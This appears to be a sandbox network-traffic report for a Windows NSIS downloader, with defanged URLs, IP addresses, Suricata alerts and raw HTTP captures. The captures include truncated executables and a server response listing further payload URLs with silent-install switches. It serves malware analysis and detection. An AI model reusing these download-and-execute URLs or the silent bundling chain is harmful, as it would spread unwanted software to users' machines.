hxxp://data.biphysics.com/r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://www.download-servers.com/vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0= 50.7.86.58
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ 204.236.233.80
hxxp://www.download-servers.com/SysInfo/Validate.exe 50.7.86.58
hxxp://sstatic1.histats.com/0.gif?2601800&101 208.43.241.179
hxxp://www.download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://sstatic1.histats.com/0.gif?2601768&101 208.43.241.179
hxxp://www.download-servers.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 50.7.86.58
hxxp://www.download-servers.com/SysInfo/tem.php?sid=83837567483 50.7.86.58
hxxp://sstatic1.histats.com/0.gif?2601603&101 208.43.241.179
hxxp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 95.211.189.16
hxxp://download-servers.com/SysInfo/Validate.exe 95.211.189.16
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:32 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}....


POST / HTTP/1.1


Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..



GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
.............J..............................................s........J
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]...`...0:..........................rsrc......
...J......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..



GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......


GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
3d1..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483..hXXp://
bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYy
NjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6Ij
EiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1
In0..hXXp://software-repository.com/Generic/zgm.php?sid=8100001../inst
all..hXXp://down.eszju.cn/8001/ttwifi.exe..{5DB9279D5A0CB29AA3ED55D055
708882}..hXXps://vnl1.izabelcoin.com/vnl1.exe../PID=1670 /S..hXXp://d2
xvc2nqkduarq.cloudfront.net/main/clc_jq.exe../c=clc /i=106 /s..hXXp://
livestatscounter.com/SysInfo/validator/timer.php..hXXp://livestatscoun
ter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2..hXXp://dl
.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe../verysilen
t..hXXp://down.hejie123.com/global/yeaplayer.exe..hXXp://VVV.liuzhoua.
com/shanghaiuc3.exe..hXXp://cloudfront.7950a1a535832c52ae50f09d3e42473
4190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe....0..HTTP/1.
1 200 OK..Server: nginx/1.6.2..Date: Fri, 29 Apr 2016 11:27:34 GMT..Co
ntent-Type: text/html..Transfer-Encoding: chunked..Connection: keep-al
ive..X-Powered-By: PHP/5.5.32..3d1..hXXp://mobilitydata5.com/SysInfo/t
em.php?sid=83837567483..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14e
Xh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSw
ic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxY
jUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..hXXp://software-repository.com/Gen
eric/zgm.php?sid=8100001../install..hXXp://down.eszju.cn/8001/ttwi
<<< skipped >>>


GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=tJEcW
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............`&...........@.................................@........@&
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
..@&.....................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


GET /r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:30 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0......


GET /r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
 11:27:31 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..<
/font>....


GET /r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....


GET /r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
 11:27:34 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..



GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..



GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
................. ...............................................t....
.......C..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...C.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 11:27:34 GMT
GIF89a.............!.......,...........D..;..



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
